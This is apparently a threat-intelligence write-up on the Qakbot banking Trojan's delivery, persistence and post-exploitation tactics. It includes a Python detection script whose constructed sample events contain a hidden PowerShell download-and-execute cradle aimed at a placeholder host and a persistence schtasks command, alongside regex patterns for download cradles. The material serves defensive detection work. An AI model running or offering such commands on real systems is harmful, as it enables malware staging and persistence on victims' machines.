Qakbot campaigns begin with a tailored phishing e-mail that carries a weaponized Office document in the message body or as an attachment...
Qakbot (also known as Pinkslipbot, Quakbot and Qbot) is a banking Trojan family first detected in 2007. Built to steal financial credentials and online banking session data, and known for spreading like a network worm, it is operated mainly by the financially motivated threat group tracked as GOLD LAGOON and has been used for account takeover fraud. Over the years its operators have steadily refined the whole set of tactics, techniques and procedures (TTPs): the delivery mechanisms, the C2 servers used to stage payloads, infrastructure designed to hinder retrieval of payloads by analysts and researchers, and increasingly capable anti-analysis and anti-reversing features. It is a modular malware framework that supports spam delivery, credential theft, interception and manipulation of web traffic through webinjects, and remote access.
Qakbot is also assessed as polymorphic: it can modify itself after it has infected an endpoint, altering its files, including the payloads it drops, so that new variants are continuously cycled through the C2 servers.
Taken together, these capabilities make Qakbot a critical threat. It has been responsible for numerous successful attacks on organizations worldwide, including government bodies, infecting tens of thousands of hosts and causing heavy financial losses for both victims and their financial institutions.
Qakbot was given new life by other malware, notably Emotet, which distributed it as a second-stage payload through unsolicited e-mail (malspam) campaigns; other infection vectors have included exploit kits and Visual Basic script downloaders. Recent Qakbot campaigns have reportedly deployed Cobalt Strike beacons, most likely to move laterally, gain persistence and establish a robust communication channel back to the threat actor. In this respect Qakbot resembles TrickBot and Emotet: it serves as an entry point for post-exploitation operations, carried out with such frameworks, that ultimately deliver ransomware. Qakbot was distributed as a second-stage download from the Emotet botnet until February 2020.
These attacks typically redirect the victim to a malicious web page that serves an Excel document acting as a dropper. Macro code in the spreadsheet downloads the main malicious file. The dropper component fetches the actual ransomware while leaving a copy of itself on the machine, creates a scheduled task for autorun and persistence, and injects itself into the explorer.exe process.
Emotet was taken down recently; since then, QakBot operators have launched specially targeted campaigns to distribute the threat worldwide and are poised to fill the gap. Qakbot applies antivirus evasion, anti-detection and anti-sandbox tactics across the entire attack chain.
Like Emotet, Qakbot can self-propagate: it brute-forces access to spread across networks and relies on "living-off-the-land" tools to do so. It uses PowerShell to download and run Mimikatz (Hacktool.Mimikatz), an open-source modular credential-theft tool that lets threat actors move quickly across a network once an initial foothold has been established.
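The two paragraphs above describe three host behaviours a defender can look for in process-creation telemetry: an Office application spawning a child process (the macro dropper), schtasks.exe creating a scheduled task (persistence), and PowerShell running a download cradle (the Mimikatz stage). The script below is an added example written for this article, not Qakbot's code or the page author's; it assumes Sysmon-style process-creation fields (image, command line, parent image), the detection heuristics are generic assumptions rather than confirmed Qakbot indicators, and every sample event is constructed for illustration.

```python
"""Flag process-creation events that match the behaviours described above.

Assumptions (not from the original article): events carry Sysmon-like fields,
and the regexes below are generic living-off-the-land heuristics.
All SAMPLE_EVENTS are constructed for illustration, not real telemetry.
"""
import re
from dataclasses import dataclass

# Office hosts whose child processes are suspicious when macros are in play.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Common PowerShell download-cradle fragments (assumption: generic heuristics).
PS_DOWNLOAD = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    cmdline: str        # full command line
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(ev: ProcEvent) -> list:
    """Return the list of rule names the event triggers (empty if benign)."""
    hits = []
    if basename(ev.parent_image) in OFFICE_PARENTS:
        hits.append("office_spawned_child")
    if basename(ev.image) == "schtasks.exe" and "/create" in ev.cmdline.lower():
        hits.append("scheduled_task_created")
    if basename(ev.image) in POWERSHELL_IMAGES and PS_DOWNLOAD.search(ev.cmdline):
        hits.append("powershell_download_cradle")
    return hits


def scan(events) -> dict:
    """Map pid -> triggered rules for every event that fires at least one rule."""
    findings = {}
    for ev in events:
        hits = detect(ev)
        if hits:
            findings[ev.pid] = hits
    return findings


# Constructed sample telemetry: two malicious chains and two benign events.
SAMPLE_EVENTS = [
    ProcEvent(101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
              r".DownloadString('http://example.invalid/m.ps1')\"",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
    ProcEvent(102, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "Updater" /TR "C:\Users\u\AppData\Roaming\x.exe" /SC ONLOGON',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(103, r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\u\notes.txt",
              r"C:\Windows\explorer.exe"),
    ProcEvent(104, r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /Query /FO LIST",
              r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(rules)}")
```

Process-creation logs cannot show the explorer.exe injection step; that requires remote-thread creation telemetry (Sysmon Event ID 8) or memory scanning, so treat the rules above as one layer, not a complete Qakbot detector.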
Qakbot was observed testing several enhancements in August 2020. In June 2020 the Trojan was updated with renewed command-and-control infrastructure, new functions and stealth capabilities intended to evade detection and analysis. Qakbot also appears to operate as malware-as-a-service: in May 2020 it was found delivering the ProLock and MegaCortex ransomware, giving those operators access to the infected networks. Its operators were also seen adding scheduled tasks on infected systems.